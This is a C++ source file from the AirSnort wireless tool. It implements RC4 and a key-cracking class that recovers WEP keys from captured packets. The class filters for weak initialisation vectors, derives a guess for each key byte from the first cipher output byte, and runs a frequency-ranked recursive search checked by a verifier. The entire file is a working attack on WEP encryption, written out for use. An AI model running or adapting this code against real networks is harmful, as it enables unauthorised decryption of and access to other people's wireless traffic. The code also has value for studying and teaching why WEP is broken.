/*
    This file is part of AirSnort.

    AirSnort is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    AirSnort is distributed in the hope that it will be useful,
      but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with AirSnort; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include "RC4.h"

#define NORM(x) (x & (N-1))
#define SWAP(i,j) do {int t=S[i]; S[i]=S[j]; S[j]=t;} while(0)

int Identity[N];

RC4::RC4() {
  memcpy(S,Identity,sizeof(int)*N);
  i=0;
  j=0;
}

void RC4::keyStep(unsigned char *K,int l) {
  j=NORM(j+S[i]+K[i%l]);
  SWAP(i,j);
  i++;
}

void RC4::keyDone() {
  i=j=0;
}

void RC4::keyWith(unsigned char *K,int l) {
  for(int a=0;a<N;a++) keyStep(K,l);
  keyDone();
}

int RC4::step() {
  i=i+1;
  j=NORM(j+S[i]);
  SWAP(i,j);
  return(S[NORM(S[i]+S[j])]);
}

int RC4::SInverse(int x) {
  int a;
  for(a=0;a<N;a++) {
    if (S[a]==x) return(a);
  }
  printf("Reality Error #1");
  exit(1);
}

/* Returns the key guess, the assumptions are as follows:
   1. I is the size of the init vector, B is which byte of the key we seek
   3. The system is in a 'resolved state' and is at time I+B of keying
   4. out is the first output byte of the cypher 
*/
int RC4::keyGuess(int I,int B,int out) { 
  return(NORM(SInverse(out)-j-S[I+B]));
}

/* Checks if the system is in a state where we can use keyGuess. Assumptions:
   1. I is the size of the IV
   2. B is byte of the key we seek
   3. In key setup as of time I+B 
*/
int RC4::isOk(int I,int B) {
  return(S[1]<I+B &&
	 NORM(S[1]+S[S[1]])==I+B);
}

/* Trys to guess key at location B, Assumptions:
   I is the size of the initialization vector.
   key is the Initialization Vector+Key
   key[x] where x<B+I is known, and in unsigned char *key.
   out is the first byte of the cypher output.

   This function returns -1 if no guess can be made (often), and even
   is made it might be wrong, but the chances of it being right are >= 5%, so
   just get a bunch of guesses and look for the answer that shows up the most
*/
int RC4::tryIV(unsigned char *key,int I,int B,int out) {
  int a;
  for(a=0;a<I+B;a++) {
    keyStep(key,16);
  }
  if (!isOk(I,B)) return(-1);
  return(keyGuess(I,B,out));
}

void RC4::setupIdentity() {
  int a;
  for(a=0;a<N;a++) {
    Identity[a]=a;
  }
}
 
struct freq_t {
  int index;
  int score;
};

int freq_compare(const void *a,const void *b) {
  return(((freq_t *) b)->score-((freq_t *) a)->score);
} 

int RC4Crack::tryByte(int which,int breadth) {
  freq_t freq[256];
  int i,r;
  Sample *cur;
  RC4 *rc;
  if (which==keySize) return(v->checkKey(curGuess+3,keySize));
  for(i=0;i<256;i++) {freq[i].score=0; freq[i].index=i;}
  cur=samples[which];
  while(cur) {
    memcpy(curGuess,cur->iv,3);
    rc=new RC4();
    int r=rc->tryIV(curGuess,3,which,cur->firstByte);
    delete rc;
    if (r>=0) freq[r].score+=1000;
    if (r>=32 && r<=127) freq[r].score+=5;
    cur=cur->next;
  }
  qsort(freq,256,sizeof(freq_t),freq_compare);
  for(i=0;i<breadth;i++) {
    if (freq[i].score==0) return(RES_FAILURE);
    curGuess[3+which]=freq[i].index;
    r=tryByte(which+1,breadth);
    if (r==RES_SUCCESS) return(r);
  }
  return(RES_BREADTH_EXCEEDED);
}

RC4Crack::RC4Crack(Verifier *v,int keySize) {
  this->v=v;
  this->keySize=keySize;
  samples=new (Sample *)[keySize];
  curGuess=new unsigned char[keySize+3];
}

RC4Crack::~RC4Crack() {
}

int RC4Crack::addSample(unsigned char *iv,unsigned char byte) {
  Sample *s;
  int loc=iv[0]-3;
  if (loc<0 || loc>=keySize) return(0);
  if (iv[1]!=255) return(0);
  s=samples[loc];
  while(s) {
    if (s->iv[2]==iv[2]) return(0);
    s=s->next;
  }
  s=new Sample;
  memcpy(s->iv,iv,3);
  s->firstByte=byte;
  s->next=samples[loc];
  samples[loc]=s;
  return(1);
}

int RC4Crack::tryCrack(int breadth,unsigned char *result) {
  int r;
  r=tryByte(0,breadth);
  if (r==RES_SUCCESS) {
    memcpy(result,curGuess+3,keySize);
  }
  return(r);
}
